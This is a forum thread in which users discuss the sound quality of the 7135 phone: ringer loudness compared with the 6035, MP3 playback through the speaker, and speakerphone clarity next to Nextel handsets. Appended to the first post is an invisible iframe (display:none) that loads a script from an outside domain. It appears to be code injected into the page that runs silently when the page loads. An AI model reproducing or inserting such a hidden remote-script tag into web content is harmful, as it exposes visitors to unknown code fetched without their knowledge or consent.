For 7135 beta testers - how does it SOUND?

I've been reading through reviews posted by 7135 beta testers and can't find many references to the sound quality of the phone.

Any beta testers care to share their experience with that aspect of the 7135?

Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I'm not a beta tester (I just play one on these boards)... but there have been many many discussions of the sound quality and nobody has anything but positive things to say!

Two things stand out in my mind regarding beta tester's evaluation of the sound quality of the 7135:

1. Ring tones are noticeably louder than with the 6035
2. While you need to be using earphones in order to thoroughly enjoy listening to high fidelity music, MP3's sound remarkably good through the phone's speaker.

I would be very interested in knowing if the speakerphone can hold up to interior car noise. I am always disappointed by built-in speaker phones in that environment.

Loud doesn't mean discernable. We get contractors in frequently who all carry Nextel phones that have loud speakerphones, but I can't understand what is coming through the speaker. Not sure if this is a 'feature' of the two way radio function or the motorola speaker.

the nexhell speaker phones are damn good. i carry a i55sr with me and the speaker phone is very clear. yes it can get distorted when cranked way up.. but those ringers can be heard from miles away....

Call me a Neanderthal (OK... all together now, "You're a Neanderthal), but I really care about the sound quality and volume for the phone's earpiece and speakerphone, not listening to mp3's (although the info on the loudness of the ringer is much appreciated). And the answer is...

Nope, that's not the answer. That's a question. Sorry, couldn't resist.

How else am I supposed to read it when someone ends a post with "and the answer is..."?
